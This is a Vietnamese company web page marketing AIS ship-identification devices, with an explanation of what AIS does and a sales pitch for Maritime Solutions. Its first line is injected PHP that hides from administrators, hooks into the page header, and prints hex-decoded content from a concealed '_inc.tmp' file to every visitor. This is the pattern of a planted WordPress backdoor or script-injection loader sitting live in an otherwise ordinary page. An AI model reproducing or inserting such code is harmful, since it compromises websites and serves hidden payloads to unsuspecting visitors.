if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Thiết bị AIS - Giải pháp hàng hải số 1 hiện nay - Maritime Solutions

0768303666

.st0{fill:#FFFFFF;}

Tin tức

Thiết bị AIS – Giải pháp hàng hải số 1 hiện nay

 Tháng Tư 14, 2021

By  minhvu

Thiết bị AIS được sử dụng rất phổ biến trong ngành hàng hải. Đặc biệt là tàu cá của bà con ngư dân. Đây được xem là một trong những thiết bị cực kỳ quan trọng cho các tàu thuyền đi biển. Sản phẩm đảm bảo sự an toàn cao và hỗ trợ hoạt động vận chuyển hàng hải hiệu quả.

AIS là gì?

AIS là một hệ thống thông tin an toàn hàng hải (ATHH) hoạt động trên băng tần VHF hàng hải. Dùng để nhận biết thông tin giữa phương tiện thủy có trang bị AIS và các đối tượng bên ngoài trong phạm vi phủ sóng VHF.

Thiết bị nhận dạng tự động AIS cho tàu, thuyền
Thiết bị nhận dạng tự động AIS cho tàu, thuyền

Thiết bị nhận dạng tự dộng AIS giúp gì cho người quản lí?

Chúng cho phép giám sát từ xa vị trí, hải trình tàu trên giao diện website với các tính năng chính:

 • Xem online vị trí tàu trên nền bản đồ Google map.
 • Tra cứu vị trí, hành trình tàu trong vòng 30 ngày.
 •  Xem hành trình tàu trong quá khứ.
 • Tra cứu thông tin chi tiết tàu.
 •  Biết được tình hình thời tiết tại khu vực tàu hành trình.

Tầm quan trọng của thiết bị AIS

Những tàu hàng được lắp đặt máy nhận dạng AIS, các tai nạn biển sẽ được hạn chế xuống mức thấp nhất. Bởi thiết bị có cơ chế hoạt động thông minh hỗ trợ người dùng nhận diện tất cả cả các chướng ngại vật phía trước. Nói một cách cụ thể hơn, công dụng nổi bật của thiết bị AIS là:

 • Nhận diện chướng ngại vật trong mọi tình huống và mọi điều kiện thời tiết khắc nghiệt. Dựa vào đây thiết bị sẽ đưa ra cảnh báo để người dùng kịp thời xử lý.
 • Phát hiện mục tiêu ở cự ly khá xa lên đến hàng trăm km. Cùng với tính năng này, sản phẩm giúp thuyền trưởng biết được đâu là núi đá, bờ đảo, đất liền và các tàu thuyền di động.
 • Nhận diện hướng di chuyển thông thoáng để tránh sự va chạm xảy ra dẫn đến tai nạn đáng tiếc. Đó là lý do vì sao thiết bị thông minh được quy định lắp đặt để ngư dân chủ động phòng chống tai nạn biển. 
 • Thông tin chi tiết tốc độ tàu thuyền, thời gian di chuyển đến đích và toàn bộ dữ liệu hành trình. Tính năng này hỗ trợ đắc lức cho quá trình quản lý tàu hàng.

Chức năng của máy AIS

AIS trang bị trên tàu thuyền có chức năng tự động phát tới các tàu khác và tới Đài Thông tin duyên hải các thông tin của tàu mình bao gồm:

 • Thông tin cố định, như số nhận dạng hàng hải (MMSI), số IMO; hô hiệu và tên tàu; các kích thước chiều dài, chiều rộng,… của tàu. Ccác thông số này được cài đặt cố định cho AIS trên mỗi con tàu tại thời điểm trang bị
 • Thông tin động, bao gồm tọa độ vị trí tàu, hướng và tốc độ di chuyển; tốc độ quay trở tức thời. Các thông số này được AIS thu thập từ các thiết bị hàng hải khác như máy định vị toàn cầu GPS, la bàn điện, tốc độ kế,…
 • Dữ liệu về hành trình: Đích đến, dự kiến thời gian đến đích ETA; loại hàng hóa; thông tin an toàn. Do người sử dụng trên tàu nhập vào trước mỗi hành trình
Chức năng "Xem thủy triều" của thiết bị AIS
Chức năng “Xem thủy triều” của thiết bị AIS

Tìm hiểu nắm đầy đủ thông tin về hệ thống VTS sử dụng AIS giúp thuyền trưởng chủ động trong hoạt động điều động tàu, nâng cao công tác bảo đảm an toàn hàng hải. Đồng thời giúp người quản lý chủ động trong công tác giám sát thông tin tàu, chủ động điều chỉnh kế hoạch hoạt động các phương tiện trên biển đạt hiệu quả cao, nâng cao chất lượng phục vụ, an toàn và phát triển.

>>Xem thêm: Thiết bị AIS giá tốt mua ở đâu?

Maritime Solutions: cung cấp thiết bị AIS hàng đầu Việt Nam

Hiểu được tầm quan trọng của thiết bị nhận dạng AIS và sự băn khoăn của khách hàng khi lựa chọn một nhà cung cấp thiết bị AIS chất lượng tốt. Chúng tôi – Maritime Solutions, tự hào mang đến cho quý khách hàng những sản phẩm đáng mong đợi.

Maritime Solutions là nhà cung cấp các dịch vụ hàng hải trọn gói như: cung cấp thiết bị máy hàng hải, dịch vụ du lịch du thuyền, sửa chữa và bảo dường tàu thuyền,… Cam kết với khách hàng về các dịch vụ chất lượng cao, phù hợp với giá cả thị trường.

Ngoài ra, công ty còn bán các sản phẩm nhập khẩu chính hãng về dòng máy phát điện Cummins kèm theo dịch vụ bảo hành tương ứng.

Hãy đến ngay với Maritime Solutions để trải nghiệm các dịch vụ chuyên nghiệp của chúng tôi. Đảm bảo sẽ làm hài lòng quý khách hàng khi đến với chúng tôi.

minhvu


Your Signature

{"email":"Email address invalid","url":"Website address invalid","required":"Required field missing"}

Liên hệ với chúng tôi để được tư vấn Dịch vụ và giá cả tốt nhất 

>